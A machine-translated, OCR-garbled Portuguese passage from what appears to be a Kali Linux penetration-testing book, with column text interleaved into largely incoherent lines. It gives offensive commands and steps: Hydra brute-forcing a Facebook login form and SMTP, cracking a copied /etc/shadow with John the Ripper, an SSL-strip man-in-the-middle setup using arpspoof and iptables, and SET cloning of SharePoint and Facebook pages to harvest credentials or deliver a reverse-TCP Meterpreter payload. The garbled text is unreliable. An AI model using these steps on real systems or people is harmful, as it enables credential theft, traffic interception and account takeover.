usando Netcat, usamos o HELO criptografados at Antes do lanamento de Hydra, voc senha.
comando para informar o a chave correta seja encontrada. deve executar Reconnaissance em Uma vez que habilitar o plugin Tamper
que servidor que somos. Ataques de fora bruta so um alvo, como um Data, podemos lanar o plugin e
[106] extremamente caros a partir de um sistema de correio. Captulo 2, o inici-lo
recurso e reconhecimento, cobre uma antes de apresentar um nome em um
Captulo 3 perspectiva de tempo, porque o ferramenta de avaliao de formulrio web.
Se recebermos uma resposta, atacante est explorando vulnerabilidades Zenmap [108]
podemos manipular a maioria dos vulnerabilidades no criptografia que pode ser usado para coletar as
servidores usando os comandos tirando proveito do comprimento da seguintes informaes para Hydra: Captulo 3
SMTP chave e simplicidade da chave. Uma Tamper Data ir exibir as informaes
(Alguns sistemas podem no ser senha baseado frequentemente inseridas nos grupos de campo. Os
vulnervel com base na configurao em palavras de dicionrio ou seja, o atacantes podem
e tipo de sistema). No espao total de um invasor teria que manipular e reenviar os dados,
seguinte exemplo, comear por dizer testar seria O endereo IP do alvo (por exemplo, mesmo que o site criptografado.
ao servidor que estamos usando o todas as palavras em um dicionrio de 192.168.1.1) Neste exemplo, vemos que o nome de
HELO comando. correspondncia fazendo o escopo Portas abertas (por exemplo, a porta usurio rosa ea senha pinkprincess
Em seguida, podemos usar o servidor adivinhando significativamente menor 80 ou 25) so
de email para retransmitir mensagens do que uma senha com caracteres Protocol (por exemplo, HTTP para utilizado quando o login boto foi
para futuros ataques do lado do aleatrios. Melhores prticas para web ou SMTP para o correio) submetido.
cliente. reduzir os ataques de fora bruta Nome de usurio (por exemplo, Ambos os exemplos so duas
HELO,CORREIO DA,Para RCP, E est usando chaves longas e admin) maneiras prticas para a realizao de
Dados so os nicos campos complicadas, bem como tempos de [107] reconhecimento em um alvo para
obrigatrios. Voc pode usar outro espera aps um nmero de tentativas reunir as informaes teis Hydra ir
campos para esconder que o e-mail e Ataques do lado do servidor precisar. H uma abundncia de
est sendo enviado para e mudar a outros mtodos para adicionar mais Outra ferramenta de reconhecimento outros mtodos
responder endereo. Uma fatores de segurana. que muitas vezes usado com Hydra e built-in ferramentas de Kali para
exemplo mudando a Responder Hidra o plugin do Firefox coletar informaes na web para usar
para tratar com o objetivo de enganar Hidra uma ferramenta desenvolvida Dados adulterao. em Hydra, no entanto, que
um receptor em pela Escolha do Hacker (THC) que Tamper Data uma ferramenta escrita recomendar Netcat e Tamper Data
enviando um e-mail para outra usa a fora bruta por Adam Judson que permite que um como os mtodos mais eficazes.
pessoa. atacante para ver HTTP
Agora que completamos nossa fase Voc pode ento executar Hydra. menos importante, voc deve digitar painel, acima Comece, um campo
de reconhecimento, vamos lanar Voc ter de fornecer um arquivo que uma URL de destino, selecione o para a escolha do ponto de partida a
Hydra e contm uma lista de nmero de threads (sugerimos vulnerabilidade
ver como podemos usar nossa nomes de usurio e um arquivo que estourar o limite avaliao. Para iniciar o interior do /
informao Reconnaissance para contm as senhas. isso a 100), ea lista de arquivos. Voc CBI-bin / pasta, coloque o texto nesse
realizar uma fora bruta hidra-L / cloudcentrics / usernamelist- pode clicar em Procurar e selecionar a campo e clique
ataque de senha. P / cloudcentrics / passwords_demo_ lista padro em Iniciar.
Para acessar Hydra do Kali, ir para file.txtt-facebook.com http-get-forma ou desenvolver o seu prprio. Provavelmente, voc vai encontrar
Ataques senha |Ataques online e "login.php login_attempt = 1: nome de [110] mais pastas dentro de pastas para
selecione usurio avaliar. Continue o
Hydra. Isto ir abrir uma Terminal = ^ ^ & EMAIL TOKEN = ^ ^ & SENHA Captulo 3 mesmo processo de parar, atualizar o
janela que ir executar login = Login: incorreto " Note-se que algumas verses de Kali campo de incio e execuo de
automaticamente, Hydra. A sintaxe pode ser complicado e no pode incluir os dicionrios padro. exames para mapear
[109] mudar de site para site. Isto pode Voc pode baixar os dicionrios o seu alvo. A figura a seguir mostra
acontecer no padro on-line e apontar para uma rvore de mapeamento para o
Ataques do lado do servidor mesmo site tambm. recomendado DirBuster cgi-bin pasta:
A documentao de abertura explica para dominar Tamper Data e Hydra los como mostrado no exemplo a [112]
como executar Hydra. Por exemplo, em um laboratrio antes seguir:
se voc quiser para apresentar ao vivo Teste de Depois de preencher as informaes Captulo 3
para atacar arquivo de senhas de uma Invaso. bsicas, clique em Comeo e Voc pode clicar no Relatrio boto
conta de administrador localizado na DirBuster DirBuster ir iniciar o para gerar um relatrio de suas
192.168.1.1 usando SMTP, DirBuster projetado para diretrios e avaliao de vulnerabilidade. Muito descobertas. Voc precisa
voc dever digitar: nomes de arquivos de fora bruta provavelmente, ele vai afirmar que o escolha onde deseja salvar o relatrio
hidra-l admin-p / root / password.txt contra aplicaes web tempo de concluso um pouco e clique em Gerar relatrio. Um
192.168.1.1 smtp servidores. comum que os dias, no entanto, normalmente voc arquivo de texto ir aparecer
Se voc gostaria de usar Hydra em servidores web apresentam-se como vai encontrar informaes teis dentro mostrando o que foi encontrado.
um formulrio web, teremos de reunir uma instalao padro de minutos. A sequncia WebSlayer
o estaduais, no entanto aplicaes e Screenshot identifica um / Cgi-bin / WebSlayer uma ferramenta de fora
informaes foram coletadas a partir pginas so realmente escondido pasta, que poderia ser interessante: bruta aplicao web. WebSlayer pode
do plug-in de dados adulterao. A dentro. DirBuster [111] ser utilizado para-bruta
sintaxe para usar Hydra projetado para procurar esses fatores forar o Form (usurio / senha),GET,
em um formulrio web <url>: <form escondidos. Ataques do lado do servidor E POST parmetros. WebSlayer
parameters>: <failure cadeia>. DirBuster pode ser encontrado em Qualquer cdigo que no seja 404 tambm pode
URL = Aplicaes Web |Crawlers Web como est aberta a fora bruta. Para ser usado para identificar os recursos
https://www.facebook.com/login.php?l dirbuster. Uma vez direcionar o / CBI-bin / dobrador no vinculados, como scripts,
ogin_attempt=1email=pink&passw abriu, h campos que devem ser encontrado durante a pesquisa, clique arquivos, diretrios e assim por diante.
d = pinkprincessl & login = "log in" preenchidos antes de iniciar um em Pare para acabar com a WebSlayer tem um gerador de carga e
ataque. No digitalizao e clique em Voltar. Na os resultados do analisador.
pgina [113]
na imagem seguinte. O exemplo servidor, importante conhecer o
Ataques do lado do servidor mostra a configurao da carga da nome de usurio ou, mais Ataques do lado do servidor
No Configurao de Ataque separador gama 0para provavelmente no vai WebSlayer O exemplo a seguir mostra a tomar as
existe uma url campo, que deve ser 1000. Uma vez que o intervalo trabalho. Voc ter que capturar informaes de login capturados em
preenchido com o objectivo selecionado, clicamos no adicionar solicitaes HTTP e tentar um login HTTP ao vivo
URI. Abaixo do campo de URL so o gerador boto, que ser para que voc Cabealhos durante a tentativa de
Cabealhos e POST campos de gerar um gerador temporal. Arraste o pode pegar o agente de usurio e acesso myspace. A senha errada
entrada de dados. Tem gerador recm-criado para a Carga contedo necessrio para o ataque. comutada para
uma opo para definir o tipo de paga Firefox oferece um plugin chamado a palavra-chave FUZZ para que
carga, que pode ser Dicio- Criador na parte inferior e clique em Viva cabealhos HTTP, que voc WebSlayer sabe onde para tentar a
nrio,AlcanceOu Carga paga. Gerar Payload. Agora podemos pode usar para reunir esta fora bruta. O
O Dicionrio pode ser um arquivo importar o novo informaes durante a tentativa de um Autenticao guia tem diferentes
contendo cargas, o que pode ser um carga no Configurao de Ataque login para o servidor de destino. O opes de segurana para o exemplo,
arquivo personalizado guia. exemplo a seguir a autenticao
ou selecionados de uma lista de [114] mostra de usurio joeymuniz usando est definido como bsico com o
dicionrios disponveis. O Alcance uma senha incorreta durante a captura nome de usurio joeymuniz seguido
configurao pode ser usada para Captulo 3 de pacotes com ao vivo por uma palavra-chave FUZZ.
especificar o intervalo para o ataque. Depois de importar o payload para o Cabealhos HTTP. Voc basicamente de entrada do site,
O Carga paga configurao pode cenrio de ataque ou selecionando [116] agente de usurio, contedo e nome
importar uma carga til do dicionrios padro, de usurio conhecido. Voc
Gerador Payload guia. A figura a voc deve selecionar onde a carga Captulo 3 adicionar a palavra-chave FUZZ onde
seguir mostra WebSlayer alvo www. ser injetado por WebSlayer. Colocar As partes importantes de informaes as senhas so necessrias e
thesecurityblogger.com: a palavra-chave capturadas a partir do Live HTTP selecione um dicionrio para
O gerador de carga til uma FUZZ no URL ser atacado faz isso. Headers brute-force esses espaos de login.
ferramenta que voc pode usar para Por exemplo, a tela a seguir utilizado em WebSlayer so o User- Esta uma maneira fcil de
criar cargas feitas sob encomenda. mostra o alvo Agent e Dados de Acesso como automatizar a fora bruta contra
Voc http://www.thesecurityblogger.com/FU mostrado na um servidor web.
pode carregar dicionrios, intervalos ZZ no campo URI ataque seguinte exemplos: myspace usa a autenticao mais
numricos, blocos de caracteres, onde FUZZ um ataque aproveitando As informaes do agente de usurio forte do que o exemplo fornecido.
permutaes, cartes de crdito, dois dicionrios existentes iria na seo de cabealhos e Alvos com recursos de segurana
nomes de usurio e outras encontrados em WebSlayer: informaes de login como bloqueio da conta,
configuraes. Voc pode concatenar [115] iria na seo de dados de postagem. provavelmente, no ser
e criar uma carga final que A URL deve corresponder pgina de vulnerveis a esta ferramenta.
podem ser enviados para o guia de Ataques do lado do servidor login. O Ferramentas de segurana
ataque para um ataque personalizado. WebSlayer pode atacar qualquer parte Autenticao seo apresenta avanadas, como a tecnologia IPS /
Um exemplo da definio de uma do pedido HTTP como cabealhos e diferentes nveis de segurana e um IDS faria
carga na gama Gerador Payload guia autenticao. Para WebSlayer a fora- espao para provavelmente ser alertado se o seu
pode ser visto bruta a senha de um web o nome de usurio. alvo fosse um bem monitorado. Por
[117] estas razes, ns
cautela contra o uso de WebSlayer em senhas criptografadas tornando o verificar o tamanho de uma nova lista Voc pode avaliar a velocidade de
alvos vivos sem fazer Reconnaissance processo mais fcil para os testadores de palavras, Joo Ripper, digitando john-test para
adequada. de penetrao. Atacantes abra um terminal e emitir o contagem obter uma
[118] Como a ferramenta, porque muito de palavras comando, uma vez que o idia de quo rpido ele ser
configurvel e pode ser configurado arquivo carregado para o executado.
Captulo 3 numa variedade de pasta ativa. Esse comando wc -1 [120]
WebSlayer oferece a capacidade de diferentes maneiras de acelerar FILENAME.
exportar cargas e descobertas no quebra de senha. comum ter palavras duplicadas Captulo 3
texto e HTML [119] quando o download e combinando Para usar um arquivo de texto
formatos. O arquivo de log tambm mltiplas personalizado, como o que se
pode ser capturado e colado em um Ataques do lado do servidor palavras listas da Internet. construiu no exemplo anterior
arquivo de texto. John the Ripper funciona da seguinte recomendado para remover chamado
Cracking senhas maneira: duplicatas, bem como qualquer NoDuplicatesOrUpperCase, Voc vai
As senhas so os usurios mais maisculas letras desde John alterna precisar para editar a lista de palavras
comuns de mtodos de autenticao estilos do caso automaticamente. Um padro. Isto pode ser
para verificar sistemas. Ele exemplo do encontrado editando o arquivo
comum identificar senhas que comando para remover palavras em john.conf sob o padro John the
podem acessar outros sistemas, maisculas : Ripper pasta. Em
enquanto explorando uma tr A-Z a-z <CustomWordFile> Nesse arquivo, voc vai encontrar a
sistema de destino. Captulo 4, os As tentativas de cracking de senhas AllLowerCaseFile lista de palavras que aponta para um
ataques do lado do cliente, fornece com palavras de dicionrio Um exemplo do comando para padro passwords.lst.
uma seco dedicada a rachaduras Usa dicionrio palavras com remover duplicatas : Alterar a lista de arquivos para o nome
senhas com muitas ferramentas caracteres alfanumricos anexos sort-u AllLowerCaseFile> do seu novo arquivo de lista de
disponveis na Kali. A prxima seo e prefixado NoDuplicatesOrUpperCase palavras. Seguindo o anterior
ir abordar Coloca dicionrio palavras juntas Verifique a nova contagem de exemplo, voc poderia alter-lo para
rachaduras senhas apresentando uma Adiciona caracteres alfanumricos palavras, emitindo o contagem de Wordlist =
ferramenta muito popular disponvel para combinar palavras palavras comando no seu novo NoDuplicatesOrUpperCase.lst. O
em Kali. Executa palavras de dicionrio com arquivo: novo arquivo de lista de palavras deve
John the Ripper caracteres especiais misturados wc -1 NoDuplicatesOrUpperCase estar na pasta especificada no
John the Ripper o cracker de senha Quando tudo mais falhar, as tentativas Para abrir o John the Ripper em Kali, john.conf arquivo. O padro
mais popular que usado hoje. Tem de fora bruta ir ao abrigo Ataques senha |Ataques listado sob o $ JOHN diretrio.
vrios mecanismos que permitem A melhor prtica atualizar o offline e Para usar o John the Ripper em um
quebrar diferentes tipos de senhas, dicionrio padro. Encontramos a lista selecionar John. Um terminal de linha arquivo de senhas, primeiro voc
incluindo criptografada de palavras padro de comando ser aberta. precisa copiar o arquivo de destino
e senhas hash. John the Ripper tem a limitado (cerca de 3.115 palavras) e, Johnny um GUI para John the ao Banheiro diretrio. Emita o
capacidade de detectar em muitos casos no vai quebrar Ripper. Johnny coberto em Captulo comando de cpia cp para mover o
automaticamente a maioria dos senhas comuns. 4, arquivo para a Banheiro
hashes e Voc pode encontrar dicionrios Ataques do lado do cliente.
atravs de pesquisa Google. Para
diretrio. Por exemplo, para copiar um forma comum de ataques man-in-the- ataques, no entanto, a implantao de A fim de executar o man-in-the-middle
arquivo shadow (um arquivo de senha middle esto entre sistemas host. No HSTS tem sido lento, e os ataques de (MITM) ataque tira SSL, voc precisa
comum encontrado em muito decapagem SSL so de dois
Sistemas Linux) tipo cp / etc / shadow. H pouco tempo, uma vulnerabilidade ainda amplamente utilizado hoje. peas de informao. Em primeiro
Uma vez que o arquivo est no foi encontrada que abusaram do Para os fins desta seo, s estar lugar, necessrio o endereo IP do
mesmo diretrio que o John the sistema que move as pessoas a partir usando uma nica interface, no alvo. Em segundo lugar, voc
Ripper, emita o comando banheiro de entanto, necessrio o endereo IP do roteador
eo nome do arquivo. Assim, para inseguro para proteger pginas web. sua mquina virtual pode ser que atua como gateway de sub-rede.
executar John the Ripper em um Isto d atacantes a capacidade de configurada com mltiplas interfaces Uma vez que este ataque
arquivo sombra, tipo john sombra. espionar usurios Ethernet. Ns mtodo s eficaz a partir da mesma
Voc pode verificar o andamento de conexo para proteger servidores ter que verificar se h vrias (virtuais) camada 2 segmentos como o alvo,
John the Ripper, premindo Enter, que web. A prxima seo ir cobrir essa interfaces Ethernet habilitados. iremos
ir mostrar vulnerabilidade. No canto superior esquerdo da rea preciso verificar o nosso prprio
a senha atual que est sendo Os ataques comuns man-in-the-middle de trabalho, clique no Xterm link para gateway padro. Para fazer isso,
imaginado, bem como as rachaduras sero abordados nos prximos abrir vamos precisar de utilizar
por segundo listado como c / s. captulos deste livro. um terminal de comando. Uso ifconfig o terminal de comando, uma vez mais.
Voc pode pausar John the Ripper, [121] para determinar o que so interfaces Em sua edio sesso de terminal o
premindo CTRL e Cchaves juntas. Se no seguinte comando:
voc reiniciar Ataques do lado do servidor mquina virtual. route-n
John emitindo john IMAGEM, Ele vai Tira SSL O comando ifconfig | grep "eth". Este Ou o comando filtrada shell route-n |
continuar de onde parou a ltima vez Em 2009, o pesquisador de segurana comando ir filtrar-out todo o grep 'UG' | awk '{print $ 2}' vontade
que o arquivo. Moxie Marlinspike em DefCon lanado as interfaces diversas e apenas nos retornar apenas o gateway padro.
Para ver os resultados, uma vez Joo, tira SSL. Ele mostrar as interfaces Ethernet, Iniciando o ataque - redirecionamento
os acabamentos do Estripador, tipo introduziu o conceito de despojamento conforme segue: Antes que possamos comear a
john-show IMAGEM. Ento, para ver o SSL, um ataque man-in-the-middle, Se tivermos mais de uma interface coletar informaes, tais como as
resultados do arquivo de sombra, tipo em que um habilitada, emitir o comando ifdown credenciais do usurio de sesses
john-show sombra. proxies HTTPS atacante rede solicita com a SSL,
Voc pode encontrar mais do usurio, em vez de enviar o trfego interagir nome para desativ-lo. Por precisamos obter algumas tarefas
informaes sobre John the Ripper, atravs do protocolo HTTP, o qual exemplo, existem interfaces nomeada realizadas. Precisamos comear as
como outros comandos no pode ser interceptado e manipulado. eth0 e eth1, instalaes que nos permitem
http://www.openwall.com/. Tira SSL automatiza o ataque emitir o comando Ifdown eth0 para para redirecionar o trfego da rede.
Man-in-the-middle e permite que algum interceptar o desativar o eth0 interface. Voc vai Alm disso, precisamos redirecionar o
Um ataque man-in-the-middle, por trfego destinado a um site seguro. O desativar seu trfego capturado por nosso
definio padro uma forma de HTTP interface no-ativo. atacando hospedeiro para que
escuta ativa estrita especificao de segurana de [122] possamos encaminhar os pacotes de
por ter um atacante fazer conexes transporte foi posteriormente usurios para tira SSL. Para fazer
independentes com as vtimas. A desenvolvido para combater estes Captulo 3 isso, ns
maioria precisa habilitar o encaminhamento de
IP em Iptables e Arpspoof.
[123] Configurando o redirecionamento de [125] servidores, bem como os servidores
porta usando o Iptables que hospedam os servios de e-mail.
Ataques do lado do servidor Isso permite que o atacante para Ataques do lado do servidor Em seguida, ns nos concentramos
As prximas trs etapas ir configurar pegar o trfego destinado a um A partir do host de destino, procure em bruto-forando
o encaminhamento de IP, servidor HTTP sobre TCP 80 e um servio de correio online, como ferramentas que poderiam acessar
redirecionamento arpspoof, redirecionar para a porta de escuta tira https://www.hotmail.com e log in dados de sistemas que no so
e configurar o redirecionamento de SSL. Neste exemplo, o Usando o menu de atalho do vulnerveis a ataques conhecidos.
porta. Estes comandos so todos redireccionamento ser em TCP aplicativo para o Sslstrip diretrio, Conclumos abordando quebra de
executados a partir de 10000 tanto para destino porta e abra outra senha e ataques man-in-the-middle;
terminal de linha de comando. redirecionar destino. O atacante pode Terminal janela e digite o seguinte no entanto, estes assuntos tm
Habilitando IP Forwarding: usar qualquer comando: dedicado sees em captulos
echo 1> / proc/sys/net/ipv4/ip_forward valor aplicvel. O destino Isso agora deve mostrar-lhe os posteriores.
Para os fins deste exemplo, vamos redirecionamento escolhido tambm resultados do SSL tira ataque. O prximo captulo vai se concentrar
precisar de saber o IP do / host alvo deve ser utilizado para a criao [126] em identificar e explorar
vtima a porta de escuta para tira SSL. O vulnerabilidades encontradas
endereo. Isso para evitar comando a seguinte: Captulo 3 em sistemas hospedeiros, tambm
contendas e ARP endereo iptables-t nat-A PREROUTING-p tcp - Note-se que o nome de usurio e conhecidos como dispositivos de
inundaes a toda a rede destination-port 80-j REDIRECT senha foram obscurecidas no cliente.
por todos os exrcitos de ataque. Em -Aos portos 10000 - exemplo a seguir, mas devem [127]
um cenrio de ataque real, ela pode [124] aparecer de forma clara e em sua tela.
ser ideal para executar arpspoof Resumo Ataques do lado do cliente
contra todo o segmento da camada 2 Captulo 3 Este captulo explica vrios mtodos O termo cliente ou host significa um
(este o padro, se IP da vtima Para desativar o PREROUTING regra, de comprometer servidores web ponto final usado para conectar a uma
omitido) substitua o -A com -D para limpar toda vulnerveis rede, tal como um
e / ou utilizar o pacote de captura e a tabela utilizando ferramentas disponveis no computador, um tablet, ou um
cheirar, a fim de determinar a vtima regras usar. Kali. Os mtodos mais comuns esto dispositivo mvel. Um cliente pode
IP. iptables-t nat-F # para lavar identificando conhecido oferecer informaes, servios e
Em um ambiente com muitos hosts iptables-t nat-L # para verificar vulnerabilidades com ferramentas aplicaes para outros clientes ou
isso pode fazer com que o fluxo de arpspoof tem muitas opes. Voc automatizadas e explorar o melhor obter informaes de outro sistema,
trfego para diminuir e pode usar o comando man iptables caminho possvel para como um
pr em causa a capacidade do ver opes adicionais. acesso ao sistema de destino. servidor. Normalmente, o cliente termo
atacante de permanecer Agora voc deve ser definido e pronto O captulo comeou com foco em refere-se a terminais utilizados por
despercebido. O comando : para iniciar a captura usando SSL tira! vrias ferramentas utilizadas para pessoas. Ter pessoas
arpspoof-i eth0-t victimip Lanamento sslstrip e da janela de identificar vulnerabilidades. envolvido abre um leque de possveis
default_gateway_ip linha de comando recm-inaugurado, O prximo tema abordado foi vulnerabilidades.
Recomenda-se que voc no enviar execute o ferramentas utilizadas para explorar Ataques do lado do cliente, no que se
esse processo para o fundo e deixar comando a seguir para iniciar o SSL vulnerabilidades encontradas em refere a aplicaes web, visto como
a janela para cima. Basta comear tira escuta em 10000 TCP port: comum um mtodo para
uma nova sesso de terminal. sslstrip-l 10000
identificar quem est ligando para Quanto menos os controles que voc escrito em um formato genrico, e Para iniciar o jogo, v para o seguinte
aplicaes web, o que colocou no lugar, a menos provvel eles no incluem um gancho forte link da barra de menus Ferramentas
vulnerabilidades existem naqueles que as polticas sero seguidas. para atrair a vtima, de Explorao |Social
sistemas, e se esses sistemas pode Isso cria uma espada de dois gumes como um mal escrito e-mail dizendo Ferramentas de engenharia, e
ser um meio para obter acesso ou ao decidir como proteger os usurios que o usurio tem o direito de fundos selecione se-toolkit.
informaes finais no reclamados. A primeira vez que voc iniciar SET
a partir de uma aplicao web. O foco ameaas cibernticas. Hackers sabem O uso de fontes de mdia social como em Kali, SET exibir as atualizaes
deste captulo ser a identificao de disso e direcionar os usurios finais de o Facebook uma tima maneira de de distribuio SET
sistemas vrias maneiras que se concentram aprender sobre um alvo, directamente a partir de GitHub. Voc
acesso a aplicaes web, avaliao em comprometer uma caracterstica- como o que passatempos e padres ser presenteado com a opo de
de sistemas de vulnerabilidades, e chave do usurio mdio, que de fala como alvo favor. Por exemplo, receber atualizaes
explorando confiana. o desenvolvimento automaticamente. Selecionar sim para
essas vulnerabilidades, se possvel. armadilhas com base em esportes receber atualizaes automticas.
Este captulo vai incidir fortemente Ataques do lado do cliente bilhetes com desconto seria ideal se [130]
sobre comprometer A engenharia social a arte de um perfil no Facebook de um
senhas, pois eles so os mtodos manipular as pessoas para a alvo coberta com os logotipos da Captulo 4
mais comuns utilizados para proteger execuo de aes de equipe de esportes. SET ir pedir-lhe para verificar se git
os sistemas de acolhimento. divulgao de informaes. Muitos Porque a maioria dos ataques do lado instalado. Kali vem com git pr-
Este captulo ir kick-off, cobrindo ataques do lado do cliente so do cliente alavancar a engenharia carregado;
como atacar anfitries usando baseadas em enganar um usurio social, a prxima seo ir no entanto, a melhor prtica
engenharia social. final explorar um popular arsenal seguindo os passos em Captulo 1,
Mais tarde, veremos como identificar em expor seus sistemas para um engenharia social disponvel em Kali. Teste de Invaso e
vulnerabilidades em sistemas host ataque. A engenharia social pode Engenharia Social Toolkit (SET) Instalao, atualizar Kali. Atualizaes
para que voc possa variar de chamar O Engenheiro social Toolkit (SET) foi ir incluir uma verso do git
explorar essas vulnerabilidades algum fingindo ser um funcionrio criado e escrito pelo fundador da necessrio para comear a trabalhar.
usando ferramentas cobertas em autorizado a postar um link em TrustedSec. uma ferramenta O Kali 1.0 no inclui o . Git diretrio.
outras sees deste livro. Ns Facebook que afirma ser um servio, orientada para Python open-source Para atualizar, voc deve seguir o
concluir com atacando senhas, enquanto realmente ser um meio para que visa Teste de Invaso os seguintes passos:
porque eles so os meios mais comprometer usando engenharia social. SET uma 1. Abra um terminal e navegue at cd /
comuns o cliente. ferramenta extremamente popular usr / share.
para proteger os sistemas host. Melhores prticas para o lanamento usado por segurana 2. Faa o backup do antigo conjunto
A engenharia social de um bem-sucedido ataque de profissionais para testar a postura de diretrio digitando mv definir
Os seres humanos sempre sero seus engenharia social tomar o tempo segurana de uma organizao. Backup.Set.
elos mais fracos para a postura de para compreender o seu alvo; Atacantes da vida real usar SET 3. Re-Download SET do GitHub
segurana de um alvo. O significado aprender como os usurios para criar ataques ativos e maliciosos. usando o seguinte comando:
mais voc tenta controlar os usurios se comunicam e tentativa a ferramenta de escolha para o mais git clone
finais, mais eles vo tentar polticas de se misturar em seu ambiente. A comum https://github.com/trustedsec/social-
bypass. maioria dos ataques de engenharia ataques de engenharia social. engineer-toolkit/
social que no tendem a ser set /
4. Salvage o velho configurao O prximo passo lanar SET, indo [134] vtimas fora da sua rede. Tipo no se
arquivo para evitar ter que definir o para Ferramentas de Explorao voc est atacando vtimas no
caminho do MSF usando: |Engenharia Social Captulo 4 mesma rede, tal como um laboratrio
cp Backup.Set / config / set_config set Toolkit |se-toolkit. SET vai perguntar se voc gostaria de interno.
/ config / set_config Depois que voc aceita todas as usar um modelo existente que vem [135]
[131] licenas e termos de servios, voc com o SET, ou
ver a tela principal se voc gostaria de clonar um site. Os Ataques do lado do cliente
Ataques do lado do cliente para SET. modelos padro no so boas, e
5. Verifique que as obras definidas [133] recomendado para clonar um site, Endereo IP / nome de host para
usando o comando se-kit de como o exemplo do SharePoint conexo reversa: Quando SET
ferramentas. Ataques do lado do cliente fornecida anteriormente. oferece sua carga
Agora que voc entende algumas das Recomenda-se selecionar o 5) Na prxima tela, SET vai apresentar vtima, SET precisa dizer a vtima
dinmicas bsicas de como funciona a Atualize o Toolkit social-Engenheiro vrias opes de como o usurio pode como ligar de volta para Kali. Numa
SET, vamos opo anterior copiar ambiente de laboratrio, voc pode
comprometer uma mquina cliente ao uso de SET. Uma vez atualizado, o site. Neste exemplo, usaremos a digitar o endereo IP do seu servidor
usando um site que pode confiar. selecione a opo 1) Os ataques de opo local-Cloner. Selecione local- de Kali.
Apesar de que podemos engenharia social-. O Cloner, URL que voc deseja clonar: Este o
usar qualquer site, recomendamos imagem seguinte mostra os diferentes SET e ir fornecer uma srie de site que voc est copiando.
algo que simples. vetores de ataque website disponvel perguntas. Estas questes iro Exploit para entregar: SET vai usar o
Aqui est um exemplo de clonar um sob Social- orient-lo atravs Metasploit estrutura para proporcionar
corporativa SharePoint local com a Ataques de engenharia em SET. A clonar um site e ter que correr de Kali. o
inteno de opo de spear phishing uma oferta Site-Cloner ir solicitar o seguinte: explorar. A opo mais popular o O
explorando a vtima por um de ataque populares Windows Reverse_TCP Meterpreter.
carregamento meterpreter. Na a capacidade de incorporar os NAT / Port Forwarding: Esta opo O do Windows Reverse_TCP
realidade, pode ser qualquer site que ataques em e-mails e PDFs. O ataque tende a confundir as pessoas. SET Meterpreter funciona por ter uma
voc de phishing lana envia est pedindo vtima executar um
quer comprometer. Ns escolhemos o ataque arquivos atravs de um falso se as vtimas ir se conectar a sua executvel que estabelece uma porta
um site do SharePoint, pois como um e-mail originada pela vtima mquina usando o endereo IP aberta para um atacante para ligar de
verificador da penetrao voc diretamente da SET. configurado volta
provavelmente vai querer usar um Para este exemplo, vamos selecionar em seu servidor de Kali ou se as atravs de obter acesso shell
alvo que vai atingir o seu objetivo. Vetores de Ataque Website, porque vtimas ir se conectar a um endereo completo para PC da vtima. A figura a
Muitos atacantes para anteriormente IP diferente seguir
propsitos nefastos podem usar um clonado um site por um ataque (Como um endereo NAT). Isso mostra as cargas disponveis.
site pblico para clonar. baseado na Web site. Em seguida, realmente entra em jogo quando voc Windows Reverse_TCP Meterpreter
Usando SET para clonar e ataque precisamos determinar como est atacando o
[132] entregar a carga. Existem vrias pessoas fora da sua rede ou na segunda opo na lista.
opes disponveis. Escolha o Java Internet. Selecionar sim se voc est Voc pode importar seu prprio
Captulo 4 Applet atacando executvel. Esta geralmente usada
Attack, que normalmente opo 1. pelos
atacantes ou outras pessoas sesso e ter privilgios de Agora que j aprendeu alguns dos a opo de importao personalizada
escrevendo suas prprias ferramentas administrador completos no dispositivo princpios bsicos do uso de SET, para apontar para o diretrio site
/ malwares. acessando o site clonado. vamos olhar para mais uma copiado. Voc vai precisar de
[137] exemplo. Vamos olhar para a experimentar para ver o que funciona
clonagem de um website para fins de melhor opo para o seu site
SET vai pedir para selecionar o tipo de Ataques do lado do cliente roubo particular.
tcnica de ofuscao anti-vrus que A mquina cliente ver uma uma senha. Vamos escolher opo 2) Stio Cloner.
voc gostaria mensagem de Java pop-up simples, Desta vez, quando chegamos s Ns ser solicitado a digitar uma URL.
para usar. SET exibir uma que parece normal e opes de ataque, vamos selecionar Iremos
classificao ao lado de cada tcnica. deve passar despercebida pelo ataque harvester credencial. clone https://www.facebook.com.
Selecione uma opo bem cotado, usurio mdio, como mostrado na O ataque harvester credencial pode Note-se que estamos entrando na
a menos que voc deseja uma opo imagem seguinte: ser encontrado primeira seleo URL exata e especificando se
especfica. A figura a seguir mostra o No momento em que o usurio final Engenharia Social queremos que o
disponvel executar o applet Java no site Ataques, Vetores de Ataque Website, HTTPS ou URL HTTP. Na maioria dos
opes. Ns vamos com opo 16, clonado, o Kali e, em seguida, Ataques Harvester casos, isso no far nenhuma
porque tem a melhor classificao. servidor ir conectar a mquina da credencial. diferena
[136] vtima, como mostrado na imagem [139] porque no vamos hospedar um site
seguinte: seguro, mas em alguns casos o HTTP
Captulo 4 O exemplo a seguir uma imagem Ataques do lado do cliente site pode ser diferente do que o local
SET vai perguntar qual a porta ouvinte mostrando que SET pode interagir Voc tem a opo de clonar um site, de HTTPS.
deve ser usado. Na maioria dos com o meterpreter usando um modelo de site, ou Tambm ser solicitado a digitar o
casos, ficar com o padro sesso e emitir comandos diretamente importar endereo IP que SET vai usar para
portos. Aps a ltima pergunta para a vtima: seus prprios arquivos da Web hospedar o falso
respondida, SET far com que o site [138] (HTML, imagens e outros arquivos). site. Muito provavelmente este ser o
clonado. Sites populares como Facebook, endereo IP da sua caixa de Kali
O novo stio clonado pode ser usado Captulo 4 Gmail, Twitter e ter modelos. Entrando Linux. No entanto, se
como um meio para comprometer Voc pode ter vrias sesses com o o URL do site pode clonar outros sites. voc est pensando em dirigir as
alvos. Voc precisa meterpreter. Neste exemplo, foi Encontramos em alguns casos, tanto vtimas para um endereo que est
para enganar os usurios para utilizado o o site usando uma traduo NAT
acessar o site clonado utilizando um comando sesses de I 1. templates e clonagem de um site (Talvez atravs de um firewall
navegador de Internet. O utilizador Essencialmente, o que estamos simplesmente no parece certo. upstream), digite o endereo NAT.
acessando o site clonado vai ter um fazendo est interagindo com o Nesses casos, voc deve usar SET comear esperando por
Java pop-up, que se for executado, ir primeiro uma importao personalizada. Voc conexes depois de ter clonado um
fornecer uma sesso do meterpreter. Se tivssemos pode usar copiadora web ou software site e
Reserve_TCP Meterpreter ao seu vrios hosts comprometidos, de clonagem web, o que temos configurada a porta de escuta, como
servidor de Kali. O atacante pode poderamos ter j discutido, para salvar uma cpia de mostrado na imagem seguinte:
iniciar um meterpreter vrias sesses Meterpreter, interagir um site em sua caixa de Kali. Uma vez [140]
com eles, alternar entre eles, ou perto salvo, o uso
los individualmente. Captulo 4
